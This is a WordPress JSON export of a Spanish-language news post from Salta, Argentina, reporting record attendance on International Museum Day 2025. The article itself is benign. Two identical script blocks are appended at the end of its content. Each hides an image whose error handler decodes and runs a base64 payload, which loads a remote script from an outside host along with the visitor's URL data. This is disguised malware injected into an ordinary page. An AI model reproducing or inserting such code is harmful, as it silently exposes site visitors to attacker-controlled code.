{"id":5158,"date":"2025-05-19T08:49:22","date_gmt":"2025-05-19T11:49:22","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5158"},"modified":"2025-08-13T23:33:27","modified_gmt":"2025-08-14T02:33:27","slug":"cifra-record-de-visitantes-en-el-dia-internacional-de-los-museos-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5158","title":{"rendered":"Cifra r\u00e9cord de visitantes en el D\u00eda Internacional de los Museos 2025"},"content":{"rendered":"\n<p><strong><em>30.715 visitantes, entre salte\u00f1os y turistas, recorrieron los museos de toda la provincia marcando nuevamente una cifra r\u00e9cord de convocatoria, y afianzando la importancia de continuar impulsando y sosteniendo esta iniciativa.<\/em><\/strong><\/p>\n\n\n\n<p>En el&nbsp;<strong>D\u00eda Internacional de los Museos 2025<\/strong>, 30.715 visitantes recorrieron los museos de toda la provincia, salte\u00f1os y turistas disfrutaron de las propuestas. En esta edici\u00f3n se registr\u00f3 un incremento del 71% de visitas, en relaci\u00f3n al a\u00f1o pasado. Veintinueve&nbsp;museos se unieron para recibir a los visitantes con entrada gratuita y una nutrida agenda de propuestas.<\/p>\n\n\n\n<p>Como siempre, esta importante movida cultural fue organizada por el Gobierno de la Provincia, a trav\u00e9s de la Secretar\u00eda de Cultura y la Subsecretar\u00eda de Patrimonio Cultural, sum\u00e1ndose Salta de este modo a los m\u00e1s de 40.000 museos que lo hacen en todo el mundo.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17419-dia-internacional-de-los-museos-cifras-records-de-visitantes.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17419-dia-internacional-de-los-museos-cifras-records-de-visitantes.webp\" alt=\"D\u00eda Internacional de los Museos: cifras r\u00e9cords de visitantes.\"\/><\/a><\/figure>\n\n\n\n<p>La jornada cont\u00f3 con una agenda especial de m\u00e1s 70 actividades diferentes para disfrutar en familia: exposiciones especiales con motivo del D\u00eda de la Escarapela, espect\u00e1culos de danza, tango y hip hop, charlas, talleres, visitas guiadas especiales, artesan\u00edas en vivo, muestras, circuitos especiales y bicicleteadas, entre muchas otras.<\/p>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>, destac\u00f3 la creciente convocatoria: \u201cEl D\u00eda Internacional de los Museos es una fecha instalada en la agenda de los salte\u00f1os, que cada a\u00f1o participan en mayor n\u00famero. Ello demuestra el impacto del trabajo sostenido que venimos realizando con fechas como esta y como la Noche de los Museos, que apunta a que los ciudadanos conozcan y se reconozcan en los museos y sus valiosas colecciones\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17420-la-ministra-cristina-fiore-viniuales-participo-del-dia-internacional-de-los-museos.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17420-la-ministra-cristina-fiore-viniuales-participo-del-dia-internacional-de-los-museos.webp\" alt=\"La ministra Cristina Fiore Vi\u00f1uales particip\u00f3 del D\u00eda Internacional de los Museos.\" style=\"width:312px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, la ministra de Educaci\u00f3n, Cultura, &nbsp;Ciencia y Tecnolog\u00eda,&nbsp;<strong>Cristina Fiore<\/strong>, resalt\u00f3 el trabajo en equipo entre los museos provinciales, nacionales, municipales y privados, que permite disfrutar de una jornada excepcional como esta: \u201cEs una alegr\u00eda ver familias enteras recorriendo los museos y compartiendo momentos de recreaci\u00f3n y aprendizaje, tanto en Salta Capital como en el resto de la provincia\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17421-dia-internacional-de-los-museos-cifras-records-de-visitantes.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17421-dia-internacional-de-los-museos-cifras-records-de-visitantes.webp\" alt=\"D\u00eda Internacional de los Museos: cifras r\u00e9cords de visitantes.\" style=\"width:356px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Los museos adheridos al D\u00eda Internacional de los Museos 2025, pertenecen a los municipios de Salta Capital, Cafayate, Cachi, Rosario de Lerma, Metan, Rosario de la Frontera, San Antonio de los Cobres, Vaqueros, Vespucio, Tartagal y Campo Santo, y son los siguientes: Museo G\u00fcemes, Museo de Bellas Artes Lola Mora, Complejo Museol\u00f3gico Explora Salta, Museo de Arte Contempor\u00e1neo, Museo de Arqueolog\u00eda de Alta Monta\u00f1a, Museo de Antropolog\u00eda de Salta, Museo Casa \u2013 Taller Jorge Hugo Rom\u00e1n, Museo Hist\u00f3rico Casa Uriburu, Museo Hist\u00f3rico del Norte \u2013 Cabildo, Museo de la Ciudad, Museo Hist\u00f3rico Policial, Museo Pajcha UCASAL, Museo San Francisco, Museo Hist\u00f3rico Rc M5 Gral G\u00fcemes, Casona de Casta\u00f1ares, Museo de Ciencias Naturales \u00abLic. Miguel \u00c1ngel Arra\u00bb, Museo de Ciencias Naturales y del Petr\u00f3leo \u201cPorf. Parodi Bustos\u201d de Vespucio, Museo Arqueol\u00f3gico Pio Pablo D\u00edaz de Cachi, Museo de la Vid y el Vino de Cafayate, Museo de Bellas Artes Quinquela Mart\u00edn de Rosario de la Frontera, Centro Cultural de los Pueblos Originarios Tartagal, Museo Molino de Piedra de Vaqueros, Museo Regional Andino de San Antonio de los Cobres, Museo Profesor Osvaldo Maidana de Campo Santo, y Museo Regional y Arqueol\u00f3gico Rodolfo Bravo, Museo Vitivin\u00edcola Nelly Murga de C\u00f3rdoba, Casa Museo Calixto Maman\u00ed, Peque\u00f1o Museo de la Moneda y Minerolog\u00eda, Archivo Hist\u00f3rico Municipal y Museo Escolar Virtual del Divisadero de Cafayate.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cifra-record-de-visitantes-en-el-dia-internacional-de-los-museos-2025-101683\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>30.715 visitantes, entre salte\u00f1os y turistas, recorrieron los museos de toda la provincia marcando nuevamente una cifra r\u00e9cord de convocatoria, y afianzando la importancia de continuar impulsando y sosteniendo esta iniciativa. En el&nbsp;D\u00eda Internacional de los Museos 2025, 30.715 visitantes recorrieron los museos de toda la provincia, salte\u00f1os y turistas disfrutaron de las propuestas. En [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5159,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-5158","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5158"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5158"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5158\/revisions"}],"predecessor-version":[{"id":6492,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5158\/revisions\/6492"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5159"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5158"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5158"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5158"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}